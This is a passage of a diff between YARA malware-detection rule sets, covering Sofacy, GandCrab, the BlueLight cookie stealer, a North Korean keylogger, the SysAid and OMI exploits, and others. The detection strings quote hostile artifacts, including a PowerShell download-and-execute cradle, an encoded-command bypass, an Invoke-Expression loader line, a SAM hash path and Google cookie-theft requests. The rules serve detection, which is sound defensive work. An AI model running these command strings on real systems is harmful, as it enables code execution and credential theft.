-		logic_hash = "97e0fec7bb4ebf326b449cc0d65eb9f024b33e1d2e54c6d3893164b66c024b2a"
-		score = 80
+		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
+		logic_hash = "3dca26e622289c2d244e3af035e892455a47daa67dbe0c6fad29d9f7403cbc6b"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541"
-		hash2 = "6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e"
+		tags = ""
 
 	strings:
-		$x1 = "UnActiveOfflineKeylogger" fullword ascii
-		$x2 = "BTRESULTDownload File|Mass Download : File Downloaded , Executing new one in temp dir...|" fullword ascii
-		$x3 = "ActiveOnlineKeylogger" fullword ascii
-		$x4 = "C:\\Users\\DarkCoderSc\\" ascii
-		$x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
-		$x6 = "BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir...|" fullword ascii
-		$s1 = "MSRSAAP.EXE" fullword wide
-		$s2 = "Command successfully executed!|" fullword ascii
-		$s3 = "BTMemoryLoadLibary: Get DLLEntyPoint failed" fullword ascii
-		$s4 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!" fullword ascii
-		$s5 = "\\Internet Explorer\\iexplore.exe" ascii
-		$s6 = "ping 127.0.0.1 -n 4 > NUL && \"" fullword ascii
-		$s7 = "BTMemoryGetProcAddress: DLL doesn't export anything" fullword ascii
-		$s8 = "POST /index.php/1.0" fullword ascii
+		$ = {10 F7 D8 1B C0 83 C0 ?? E9 ?? 01 00 00 39 85 7C FF FF FF 0F 85 ?? 01 00
+      00 83 BD 70 FF FF FF 04 8B 8D 74 FF FF FF 75 0B 85 C9 0F 85 ?? 01 00 00 6A 05
+      5E }
+		$ = {01 00 00 3B FA 0F 84 ?? 01 00 00 80 7D 80 00 B1 62 74 1D 6A 0D 8D 45 80
+      68 ?? ?? ?? 10 50 FF 15 ?? ?? ?? 10 83 C4 0C B1 6F 85 C0 75 03 8A 4D 8D 8B C6
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of them )
+		any of them
 }
-rule SIGNATURE_BASE_Malware_QA_Tls : FILE
+rule SIGNATURE_BASE_VULN_LNX_OMI_RCE_CVE_2021_386471_Sep21 : CVE_2021_38647 FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file tls.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3b654b1-73cf-5e04-a332-34777f646a66"
-		date = "2016-08-29"
+		description = "Detects a Linux OMI version vulnerable to CVE-2021-38647 (OMIGOD) which enables an unauthenticated RCE"
+		author = "Christian Burkard"
+		id = "ca49f0cc-ea33-559c-bd4f-306a01315fce"
+		date = "2021-09-16"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L71-L87"
+		reference = "https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2021_386471_omi.yar#L1-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "20c849d8c60acd77a28244c7ebcbb2f96b233e74af6c52112a0c828e1de2ed84"
-		score = 80
+		logic_hash = "99fddcf763f41a08a8ef8240d544ef67b840a1b5ae709bd7efbcbcad8268e8a5"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f06d1f2bee2eb6590afbfa7f011ceba9bd91ba31cdc721bc728e13b547ac9370"
+		tags = "CVE-2021-38647, FILE"
 
 	strings:
-		$s1 = "\\funoverip\\ultimate-payload-template1\\" ascii
-		$s2 = "ULTIMATEPAYLOADTEMPLATE1" fullword wide
-		$s3 = "ultimate-payload-template1" fullword wide
+		$a1 = "/opt/omi/bin/omiagent" ascii fullword
+		$s1 = "OMI-1.6.8-0 - " ascii
+		$s2 = "OMI-1.6.6-0 - " ascii
+		$s3 = "OMI-1.6.4-1 - " ascii
+		$s4 = "OMI-1.6.4-0 - " ascii
+		$s5 = "OMI-1.6.2-0 - " ascii
+		$s6 = "OMI-1.6.1-0 - " ascii
+		$s7 = "OMI-1.5.0-0 - " ascii
+		$s8 = "OMI-1.4.4-0 - " ascii
+		$s9 = "OMI-1.4.3-2 - " ascii
+		$s10 = "OMI-1.4.3-1 - " ascii
+		$s11 = "OMI-1.4.3-0 - " ascii
+		$s12 = "OMI-1.4.2-5 - " ascii
+		$s13 = "OMI-1.4.2-4 - " ascii
+		$s14 = "OMI-1.4.2-3 - " ascii
+		$s15 = "OMI-1.4.2-2 - " ascii
+		$s16 = "OMI-1.4.2-1 - " ascii
+		$s17 = "OMI-1.4.1-1 - " ascii
+		$s18 = "OMI-1.4.1-0 - " ascii
+		$s19 = "OMI-1.4.0-6 - " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+		uint32be( 0 ) == 0x7f454c46 and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Malware_QA_Get_The_Fucking_IP : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_Keylogger_Unknown_Nov19_1 : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file get The FucKinG IP.exe"
+		description = "Detects unknown keylogger reported by CNMF in November 2019"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c992fc5-79cf-532c-a18b-cfcc3406d6ed"
-		date = "2016-08-29"
+		id = "5311d883-52e0-5503-9494-c583fabbedfe"
+		date = "2019-11-06"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L89-L107"
+		reference = "https://twitter.com/CNMF_VirusAlert/status/1192131508007505921"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_gen.yar#L2-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab6a60142ef0e7a6e079a1b62da0b962dc3b59584b785516e93c74669574a81b"
-		score = 80
+		logic_hash = "a3b5c82cb8aa09e3c1b955bb175046e86f96da1f187eb46df83caaaf9e1370b2"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b2c04e384919075be96e3412d92c14fc1165d1bc7556fd207488959c5c4d2f7"
+		hash1 = "04d70bb249206a006f83db39bbe49ff6e520ea329e5fbb9c758d426b1c8dec30"
+		hash2 = "618a67048d0a9217317c1d1790ad5f6b044eaa58a433bd46ec2fb9f9ff563dc6"
 
 	strings:
-		$x1 = "C:\\Users\\Mdram ahmed\\AppData"
-		$x2 = "\\Local\\Temporary Projects\\get The FucKinG IP\\" ascii
-		$x3 = "get The FucKinG IP.exe" fullword wide
-		$x4 = "get ip by mdr3m" fullword wide
-		$x5 = "MDR3M kik: Mdr3mhm" fullword wide
+		$x1 = "CKeyLogDlg::Keylogger_WriteFile" ascii
+		$x2 = "Keylog file is saved >>>>>> %s" fullword ascii
+		$x3 = "MicCap file is saved >>>>>> %s" fullword ascii
+		$x4 = "cr5cr33nc4p.dat" fullword ascii
+		$xc1 = { 73 74 61 74 75 73 00 00 5C 4B 65 79 6C 6F 67 }
+		$xc2 = { 5B 43 4D 69 63 43 61 70 44 6C 67 5D 2E 00 00 00
+               25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64
+               25 30 32 64 2E 77 61 76 }
+		$xc3 = { 25 73 00 00 25 73 5C 2A 2E 2A 00 00 61 62 00 00
+               5B 25 73 5D 20 75 70 6C 6F 61 64 20 66 61 69 6C
+               65 64 2E 00 72 62 00 00 5B 25 73 5D 20 6F 70 65
+               6E 20 66 61 69 6C 65 64 2E 00 00 00 2E 2E 00 00
+               5B 25 73 20 2D 3E 20 25 73 5D 20 63 6F 70 79 20
+               66 61 69 6C 65 64 }
+		$s1 = "%s\\cmd.exe /c %s" fullword ascii
+		$s2 = "File upload error occured in [CFSDlg::ProcessResultMessage]." fullword ascii
+		$s3 = "\\SAM\\Domains\\Account\\Users\\Names" ascii
+		$s4 = "%s_hist%d:%d:%s:%s:::" fullword ascii
+		$s5 = "CARAT_Ws2_32.dll" fullword ascii
+		$s6 = "PID [%s], open process failed." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 40000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Malware_QA_Vqgk : FILE
+
+rule SIGNATURE_BASE_Sofacy_Campaign_Mal_Feb18_Cdnver : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file vqgk.dll"
+		description = "Detects Sofacy malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9246d9de-92e5-5cb8-857c-1e222c3d74d5"
-		date = "2016-08-29"
-		modified = "2022-12-21"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L109-L137"
+		id = "a5c72ddd-91b0-5410-9d81-38a138ec7efe"
+		date = "2018-02-07"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ClearskySec/status/960924755355369472"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L4-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19b7099cdb8a984f1ba6cf88024db398a81ac4f4bf3c16cac40c5ee0e5b465fd"
-		score = 80
+		logic_hash = "cd3fa21710054a96cc85da13d98e0882deaa574708c833349638b57b6088131c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
+		hash1 = "12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8"
 
 	strings:
-		$x1 = "Z:\\devcenter\\aggressor\\external" ascii
-		$x2 = "\\beacon\\Release\\beacon.pdb" ascii
-		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$x4 = "%d is an x64 process (can't inject x86 content)" fullword ascii
-		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$s2 = "Could not open process token: %d (%u)" fullword ascii
-		$s3 = "\\\\%s\\pipe\\msagent_%x" fullword ascii
-		$s4 = "\\sysnative\\rundll32.exe" ascii
-		$s5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$s6 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$s7 = "could not write to process memory: %d" fullword ascii
-		$s8 = "beacon.dll" fullword ascii
-		$s9 = "Failed to impersonate token from %d (%u)" fullword ascii
+		$x1 = "cdnver.dll" fullword wide
+		$x2 = { 25 73 0A 00 00 00 00 00 30 00 00 00 20 00 2D 00
+              20 00 00 00 0A 00 00 00 25 00 73 00 00 00 00 00
+              69 00 6D 00 61 00 67 00 65 00 2F 00 6A 00 70 00
+              65 00 67 }
+		$s1 = "S7%s - %lu" fullword ascii
+		$s2 = "SNFIRNW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 7 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "01f3d0fe6fb9d9df24620e67afc143c7" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Malware_QA_1177 : FILE
+
+rule SIGNATURE_BASE_Sofacy_Trojan_Loader_Feb18_1 : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file 1177.vbs"
+		description = "Sofacy Activity Feb 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "363228c1-f9f8-5319-91b2-7eabdd1ca3f8"
-		date = "2016-08-29"
+		id = "358d7a77-0ff5-572e-9cd8-b2cebaace02f"
+		date = "2018-03-01"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L139-L161"
+		reference = "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L29-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0fa8e6c048bcc51553e8078a71416013696dd937c1508cd636873eab56c3797f"
-		score = 80
-		quality = 81
+		logic_hash = "b1946af23fa0de69f5631a66fa211dab5d8731b5afdb23898428842232752e77"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ff3a2740330a6cbae7888e7066942b53015728c367cf9725e840af5b2a3fa247"
+		hash1 = "335565711db93cd02d948f472c51598be4d62d60f70f25a20449c07eae36c8c5"
 
 	strings:
-		$x1 = ".specialfolders (\"startup\") & \"\\ServerName.EXE\"" fullword ascii
-		$x2 = "expandenvironmentstrings(\"%%InsallDir%%\") " ascii
-		$s1 = "CreateObject(\"WScript.Shell\").Run(" ascii
-		$s2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA" ascii
-		$s3 = "cial Thank's to Dev-point.com" fullword ascii
-		$s4 = ".createElement(\"tmp\")" fullword ascii
-		$s5 = "'%CopyToStartUp%" fullword ascii
+		$x1 = "%appdata%\\nad.dll" fullword wide
+		$s3 = "%appdata%\\nad.bat" fullword wide
+		$s1 = "apds.dll" fullword ascii
+		$s2 = "nad.dll\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x4d27 and filesize < 100KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "VidBitRpl" ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample1 : FILE
+
+rule SIGNATURE_BASE_APT_ATP28_Sofacy_Indicators_May19_1 : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		description = "Detects APT28 Sofacy indicators in samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62b577e3-7ccb-59df-a944-96ffe9b16d3d"
-		date = "2016-06-14"
+		id = "ca768b60-7094-537a-b848-28bd42555287"
+		date = "2019-05-18"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L10-L25"
+		reference = "https://twitter.com/cyb3rops/status/1129647994603790338"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L53-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "761cec3d04e6b5273cfb450000023ed10ea73d17648c0af7660f4ef2b37fc31c"
-		score = 85
+		logic_hash = "4e3530f540cc66e99b82bd88887943c8e524d4d750734058d9a7b27f76bc6871"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
+		hash1 = "80548416ffb3d156d3ad332718ed322ef54b8e7b2cc77a7c5457af57f51d987a"
+		hash2 = "b40909ac0b70b7bd82465dfc7761a6b4e0df55b894dd42290e3f72cb4280fa44"
 
 	strings:
-		$s1 = "clconfg.dll" fullword ascii
-		$s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide
+		$x1 = "c:\\Users\\user\\Desktop\\openssl-1.0.1e_m\\/ssl/cert.pem" ascii
+		$x2 = "C:\\Users\\User\\Desktop\\Downloader_Poco" ascii
+		$s1 = "w%SystemRoot%\\System32\\npmproxy.dll" fullword wide
+		$op0 = { e8 41 37 f6 ff 48 2b e0 e8 99 ff ff ff 48 8b d0 }
+		$op1 = { e9 34 3c e3 ff cc cc cc cc 48 8d 8a 20 }
+		$op2 = { e8 af bb ef ff b8 ff ff ff ff e9 f4 01 00 00 8b }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "f4e1c3aaec90d5dfa23c04da75ac9501" or 1 of ( $x* ) or ( $s1 and 2 of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample2 : FILE
+
+rule SIGNATURE_BASE_SUSP_THOR_Unsigned_Oct23_1 : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21561e13-a190-565e-a08b-e6a07c84c3db"
-		date = "2016-06-14"
+		description = "Detects unsigned version of THOR scanner, which could be a backdoored / modified version of the scanner"
+		author = "Florian Roth"
+		id = "2ca6a192-675e-5f02-a7b1-40369eeb9904"
+		date = "2023-10-28"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L27-L49"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unsigned_thor.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1f334996527556334c34d0308da6165e9d2a3d7eb8b2ecc322b574dea4d4844"
-		score = 85
+		logic_hash = "12303e3549071dd6c8896f7a1222eb5905f6b4d3f320134416a5b6d53857adeb"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
-		hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
-		hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
 
 	strings:
-		$x1 = "DGMNOEP" fullword ascii
-		$x2 = "/%s%s%s/?%s=" fullword ascii
-		$s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
-		$s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
-		$s3 = "svchost.dll" fullword wide
-		$s4 = "clconfig.dll" fullword wide
+		$s1 = "THOR APT Scanner" wide fullword
+		$s2 = "Nextron Systems GmbH" wide fullword
+		$sc1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 74 00 68 00 6F 00 72 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $x* ) ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures == 0
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample3 : FILE
+rule SIGNATURE_BASE_Servantshell : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f97bc840-0d9a-5a9e-9e13-7b7f8acc53a5"
-		date = "2016-06-14"
+		description = "Detects Servantshell malware"
+		author = "Arbor Networks ASERT Nov 2015"
+		id = "f41e9191-0be1-59f7-9be4-e39c8a37b2c5"
+		date = "2017-02-02"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L51-L65"
+		reference = "https://tinyurl.com/jmp7nrs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_servantshell.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bdc6fcc30ebd7a966391747e4156a6d94dc9187e8b8898de4c441540ec4e637e"
-		score = 85
+		logic_hash = "739057dc95831c9ed35981b40c606ecd0b3fd2118b42ed7c09e200dc0bc395db"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
 
 	strings:
-		$s1 = "ASLIiasiuqpssuqkl713h" fullword wide
+		$string1 = "SelfDestruction.cpp"
+		$string2 = "SvtShell.cpp"
+		$string3 = "InitServant"
+		$string4 = "DeinitServant"
+		$string5 = "CheckDT"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $s1
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Gandcrab_Apr18_1 : FILE
+rule SIGNATURE_BASE_APT_PS1_Sysaid_EXPL_Forensicartifacts_Nov23_1 : SCRIPT CVE_2023_47246
 {
 	meta:
-		description = "Detects GandCrab malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef7983cd-a7b3-5ce2-8cff-1bcf35bc6140"
-		date = "2018-04-23"
+		description = "Detects forensic artifacts found in attacks on SysAid on-prem software exploiting CVE-2023-47246"
+		author = "Florian Roth"
+		id = "df7997d3-9309-58b3-8cd7-de9fea36d3c7"
+		date = "2023-11-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/MarceloRivero/status/988455516094550017"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_grandcrab.yar#L3-L14"
+		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70fc8deb91126a7404095aaa512e9b7542fe8605f83a037a10f8ccff76c27d4f"
-		score = 75
+		logic_hash = "85efeea88961ca99b22004726d88efc46c748273b9a0b3be674f4cbb12cd3dd1"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6fafe7bb56fd2696f2243fc305fe0c38f550dffcfc5fca04f70398880570ffff"
+		tags = "SCRIPT, CVE-2023-47246"
+
+	strings:
+		$x1 = "if ($s -match '^(Sophos).*\\.exe\\s') {echo $s; $bp++;}" ascii wide
+		$x2 = "$s=$env:SehCore;$env:SehCore=\"\";Invoke-Expression $s;" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "7936b0e9491fd747bf2675a7ec8af8ba"
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Bluelight_B : INKYSQUID
+rule SIGNATURE_BASE_MAL_Loader_Turtleloader_Nov23 : CVE_2023_47246 FILE
 {
 	meta:
-		description = "North Korean origin malware which uses a custom Google App for c2 communications."
-		author = "threatintel@volexity.com"
-		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
-		date = "2021-06-21"
+		description = "Detects Tutle loader used in attacks against SysAid CVE-2023-47246"
+		author = "Florian Roth"
+		id = "c7b5d03d-52c4-59b4-ac69-55e532a21340"
+		date = "2023-11-09"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37_bluelight.yar#L12-L112"
+		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L17-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50"
-		score = 75
-		quality = 60
-		tags = "INKYSQUID"
-		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		logic_hash = "14a1636ed4dc3c897fefe53946e67339f91da9e2fbed2c99b9b4119dcc2649c0"
+		score = 85
+		quality = 85
+		tags = "CVE-2023-47246, FILE"
+		hash1 = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d"
 
 	strings:
-		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
-		$f1 = "%ls.INTEG.RAW" wide
-		$f2 = "edb.chk" ascii
-		$f3 = "edb.log" ascii
-		$f4 = "edbres00001.jrs" ascii
-		$f5 = "edbres00002.jrs" ascii
-		$f6 = "edbtmp.log" ascii
-		$f7 = "cheV01.dat" ascii
-		$chrome1 = "Failed to get chrome cookie"
-		$chrome2 = "mail.google.com, cookie_name: OSID"
-		$chrome3 = ".google.com, cookie_name: SID,"
-		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
-		$chrome5 = "Failed to get Edge cookie"
-		$chrome6 = "google.com, cookie_name: SID,"
-		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
-		$chrome8 = "Failed to get New Edge cookie"
-		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
-		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome12 = "https://mail.google.com"
-		$chrome13 = "result.html"
-		$chrome14 = "GM_ACTION_TOKEN"
-		$chrome15 = "GM_ID_KEY="
-		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
-		$chrome17 = "p_bx_ie=1"
-		$chrome18 = "myaccount.google.com, cookie_name: OSID"
-		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
-		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome22 = "https://myaccount.google.com"
-		$chrome23 = "result.html"
-		$chrome24 = "myaccount.google.com"
-		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
-		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
-		$chrome27 = "response.html"
-		$msg1 = "https_status is %s"
-		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg4 = "Failed HttpSendRequest to mail.google.com"
-		$msg5 = "Success to enable imap"
-		$msg6 = "Failed to enable imap"
-		$msg7 = "Success to find SNlM0e"
-		$msg8 = "Failed to find SNlM0e"
-		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
-		$msg10 = "Success to enable thunder access"
-		$msg11 = "Failed to enable thunder access"
-		$keylogger_component1 = "[TAB]"
-		$keylogger_component2 = "[RETURN]"
-		$keylogger_component3 = "PAUSE"
-		$keylogger_component4 = "[ESC]"
-		$keylogger_component5 = "[PAGE UP]"
-		$keylogger_component6 = "[PAGE DOWN]"
-		$keylogger_component7 = "[END]"
-		$keylogger_component8 = "[HOME]"
-		$keylogger_component9 = "[ARROW LEFT]"
-		$keylogger_component10 = "[ARROW UP]"
-		$keylogger_component11 = "[ARROW RIGHT]"
-		$keylogger_component12 = "[ARROW DOWN]"
-		$keylogger_component13 = "[INS]"
-		$keylogger_component14 = "[DEL]"
